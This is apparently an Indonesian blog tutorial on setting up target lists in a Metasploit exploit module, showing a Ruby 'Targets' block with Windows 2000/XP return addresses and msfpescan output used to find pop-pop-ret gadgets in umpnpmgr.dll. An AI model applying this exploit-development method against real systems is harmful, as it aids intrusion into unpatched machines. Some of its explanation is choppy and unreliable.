Mendefinisikan daftar target (nama, nomor, dan option).
Target  harus dispesifikasikan dengan nomor ketika di lauching
'Targets'  =>
          [
                 # Windows 2000 – TARGET =  0
                 [
                      'Windows 2000  English',
                      {
                            'Rets' => [ 0x773242e0 ],                                         
                       },
                 ],
                 # Windows XP -  TARGET = 1
                 [
                      'Windows  XP English',
                      {
                            'Rets' => [ 0x7449bf1a ],
                      },
                  ],            
          ],
'DefaultTarget' => 0))
Block  Target Option
ini disimbolkan dengan spesial name :
- Ret  kependekan dari target.ret()
- 'Payload' overload exploit
Option,  contoh:
- kembalian address Windows 2000
- 500 bytes untuk  target Windows XP
- Windows Vista NX untuk bypass addressnya
Informasi  Target
memasuki target menggunakan hash :
-  target['padcount']
- target['Rets'][0]
-  target['Payload']['BadChars']
- target['opnum']
Menambah  dan Memfixkan target Exploit
contoh target kita adalah Windows  2000
untuk membuat address exploitnya adalah dengan menemukan file  umpnpmgr.dll
ditabel terlihat :
'Windows 2000 SP0-SP4',
{
           'Ret'          => 0x767a38f6,  # umpnpmgr.dll
}
Nah  dengan acuan itu kita akan membuat exploit numbernya
root@bt4:/pentest/exploits/framework3#  ./msfpescan -D -a 0x767a38f6 win2000sp4.umpnpmgr.dll
[win200sp4.umpnpmgr.dll]
0x767a38f6  5f5ec3558bec6aff68003c7a7668e427
00000000 5F                pop  edi
00000001 5E                pop esi
00000002  C3                ret
00000003 55                push ebp
00000004  8BEC              mov ebp,esp
00000006 6AFF              push  byte -0x1
00000008 68003C7A76        push 0x767a3c00
0000000D  68                db 0x68
0000000E E427              in al,0x27
kemudian  kita menggunakan mesin msfpescan :
root@bt4:/pentest/exploits/framework3#  ./msfpescan -p targetos.umpnpmgr.dll
[targetos.umpnpmgr.dll]
0x79001567  pop eax; pop esi; ret
0x79011e0b pop eax; pop esi; retn 0x0008
0x79012749  pop esi; pop ebp; retn 0x0010
0x7901285c pop edi; pop esi; retn  0x0004
Nah kita sudah menemukan nomor target
'Windows  2000 SP0-SP4 Russian Language',
{
          'Ret'           => 0x7901285c,  # umpnpmgr.dll
}
 » 
Hack
 » Tips Menentukan Berbagai Target Windows dengan Metasploit (cm115)
 » 
Hack
 » Tips Menentukan Berbagai Target Windows dengan Metasploit (cm115)
 
   



Silahkan Tulis Komentar Anda ...